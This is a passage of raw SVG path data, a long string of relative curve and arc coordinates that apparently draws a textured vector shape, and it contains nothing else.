.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2